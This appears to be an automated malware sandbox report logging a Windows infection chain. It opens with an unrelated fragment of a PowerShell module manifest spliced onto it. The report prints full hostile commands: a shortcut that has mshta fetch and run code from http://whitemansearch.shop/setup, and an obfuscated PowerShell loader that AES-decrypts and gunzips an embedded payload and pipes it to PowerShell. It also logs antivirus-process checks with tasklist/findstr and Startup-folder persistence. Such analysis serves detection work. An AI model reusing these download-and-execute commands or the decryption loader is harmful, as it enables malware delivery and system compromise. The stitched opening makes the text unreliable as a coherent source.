Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://whitemansearch.shop/setup
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe start mshta http://whitemansearch.shop/setup
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setup
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1972,i,9908124520727013637,16052359887422154875,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe"
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29026
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 29026\Identification.pif
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 29026\m
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif 29026\Identification.pif 29026\m
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
              Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe start mshta http://whitemansearch.shop/setupJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setupJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe" Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1972,i,9908124520727013637,16052359887422154875,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29026Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 29026\Identification.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 29026\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif 29026\Identification.pif 29026\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: setup.lnkLNK file: ..\..\..\..\Windows\System32\forfiles.exe
              Source: Google Drive.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: calc.pdbGCTL source: mshta.exe, 00000004.00000002.2039404857.00000278B7457000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027635373.00000278B7456000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026956096.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B7461000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2030741476.00000278B7456000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027458057.00000278B74CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027587413.00000278B74D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036185120.00000278B7457000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027168564.00000278B7455000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B744F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B73E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026299956.00000278B746A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdb source: Identification.pif, 00000019.00000003.2989835694.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: Identification.pif, 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: Identification.pif, 00000019.00000003.2988525996.0000000002010000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: e.pdb`] source: powershell.exe, 00000008.00000002.2239404211.0000023DA295C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: calc.pdb source: mshta.exe, 00000004.00000003.2024473416.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026956096.00000278B74BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2024473416.00000278B7461000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027458057.00000278B74CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2027587413.00000278B74D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2026299956.00000278B746A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdbUGP source: Identification.pif, 00000019.00000003.2988525996.0000000002010000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbUGP source: Identification.pif, 00000019.00000003.2989835694.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: Identification.pif, 00000019.00000003.2990376919.0000000004BE0000.00000004.00000001.00020000.00000000.sdmp, Identification.pif, 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.Trans
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D69F30 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,12_2_00D69F30
              Source: Producing.12.drStatic PE information: real checksum: 0xf5a21 should be: 0x30d94
              Source: ClassroomEc.exe.8.drStatic PE information: real checksum: 0x128df5 should be: 0x136e72
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF8487C00BD pushad ; iretd 6_2_00007FF8487C00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF84868D2A5 pushad ; iretd 8_2_00007FF84868D2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487A8167 push ebx; ret 8_2_00007FF8487A816A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487AFB5D push esp; retf 8_2_00007FF8487AFB5E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF8487A00BD pushad ; iretd 8_2_00007FF8487A00C1
